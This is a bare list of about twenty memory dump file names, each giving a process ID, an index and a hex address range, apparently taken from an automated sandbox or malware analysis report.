memory/3020-1914-0x00007FF778E90000-0x00007FF779282000-memory.dmp

memory/1716-1945-0x00007FF7AC610000-0x00007FF7ACA02000-memory.dmp

memory/876-1949-0x00007FF728630000-0x00007FF728A22000-memory.dmp

memory/3076-1975-0x00007FF60DDD0000-0x00007FF60E1C2000-memory.dmp

memory/3684-2037-0x00007FF6CD150000-0x00007FF6CD542000-memory.dmp

memory/2744-2041-0x00007FF753DC0000-0x00007FF7541B2000-memory.dmp

memory/1132-2048-0x00007FF712C10000-0x00007FF713002000-memory.dmp

memory/1288-2094-0x00007FF71BF10000-0x00007FF71C302000-memory.dmp

memory/4864-2116-0x00007FF6AB090000-0x00007FF6AB482000-memory.dmp

memory/4784-2070-0x00007FF60B840000-0x00007FF60BC32000-memory.dmp

memory/2984-2053-0x00007FF67A210000-0x00007FF67A602000-memory.dmp

memory/1092-2088-0x00007FF6234E0000-0x00007FF6238D2000-memory.dmp

memory/3128-2068-0x00007FF62B5F0000-0x00007FF62B9E2000-memory.dmp

memory/5052-2066-0x00007FF676D60000-0x00007FF677152000-memory.dmp

memory/4528-2063-0x00007FF68A480000-0x00007FF68A872000-memory.dmp

memory/4700-2057-0x00007FF65C610000-0x00007FF65CA02000-memory.dmp

memory/2676-2056-0x00007FF67D2E0000-0x00007FF67D6D2000-memory.dmp

memory/4664-3429-0x00007FF6497F0000-0x00007FF649BE2000-memory.dmp

memory/4660-5809-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/4660-6263-0x00007FFCA3103000-0x00007FFCA3105000-memory.dmp

memory/4660-6918-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp